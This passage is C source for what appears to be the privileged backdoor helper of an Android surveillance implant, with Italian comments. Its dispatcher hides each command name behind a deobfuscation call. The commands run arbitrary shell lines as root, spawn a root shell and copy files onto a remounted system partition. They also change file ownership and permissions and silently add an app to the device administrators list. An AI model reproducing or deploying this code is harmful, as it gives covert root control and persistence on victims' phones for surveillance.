LOG("Removing %s from %s\n", argv[3], argv[2]);
delete_root(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(sd)) == 0) { // Mount /sdcard
LOG("Mounting /sdcard\n");
my_mount(deobfuscate(mntsdcard));
} else if (strcmp(argv[1], deobfuscate(air)) == 0) { // Am I Root?
LOG("Are we root?\n");
return setgod();
} else if (strcmp(argv[1], deobfuscate(qzx)) == 0) { // Eseguiamo la riga passataci
LOG("Executing \"%s\"\n", argv[2]);
return system(argv[2]);
} else if (strcmp(argv[1], deobfuscate(fhc)) == 0) { // Copiamo un file nel path specificato dal secondo argomento
LOG("Copying file %s to %s\n", argv[2], argv[3]);
copy(argv[2], argv[3]);
return 0;
} else if (strcmp(argv[1], deobfuscate(fhs)) == 0) { // Copiamo un file nel path specificato dal secondo argomento (con remount del mntpoint)
LOG("Copying file %s to %s on mountpoint %s\n", argv[3], argv[4], argv[2]);
copy_remount(argv[2], argv[3], argv[4]);
return 0;
} else if (strcmp(argv[1], deobfuscate(fho)) == 0) { // chown: user group file
LOG("Chowning to %s:%s file %s\n", argv[2], argv[3], argv[4]);
my_chown(argv[2], argv[3], argv[4]);
return 0;
} else if (strcmp(argv[1], deobfuscate(pzm)) == 0) { // chmod: newmode file
LOG("Chmodding to %s file %s\n", argv[2], argv[3]);
my_chmod(argv[2], argv[3]);
return 0;
} else if (strcmp(argv[1], deobfuscate(adm)) == 0) { // Add the application to the admin list
LOG("Adding the app %s to Administrators list\n", argv[2]);
add_admin(argv[2]);
return 0;
} else if (strcmp(argv[1], deobfuscate(lid)) == 0) { // Write pid of a process to file
LOG("Returning process ID for %s to %s\n", argv[2], argv[3]);
i = getProcessId(argv[2]);
LOG("Process id is: %d\n", i);
log_to_file(argv[3], (char *)&i, sizeof(int));
return 0;
} else if (strcmp(argv[1], deobfuscate(ape)) == 0) { // Append text content to file, add newline
LOG("Appending %s to %s\n", argv[2], argv[3]);
return append_content(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(srh)) == 0) { // Search for content in file return 1 if content is present 0 if not, -1 in case of error
LOG("Searching for %s in %s\n", argv[2], argv[3]);
return search_content(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(qzs)) == 0) { // Eseguiamo una root shell
const char * shell = deobfuscate(binsh1);
LOG("Starting root shell\n");
int i;
char *exec_args[argc + 1];
exec_args[argc] = NULL;
exec_args[0] = deobfuscate(sh);
for (i = 1; i < argc; i++) {
exec_args[i] = argv[i];
}
execv(deobfuscate(binsh2), exec_args);
LOG("Exiting shell\n");
}
return 0;
}
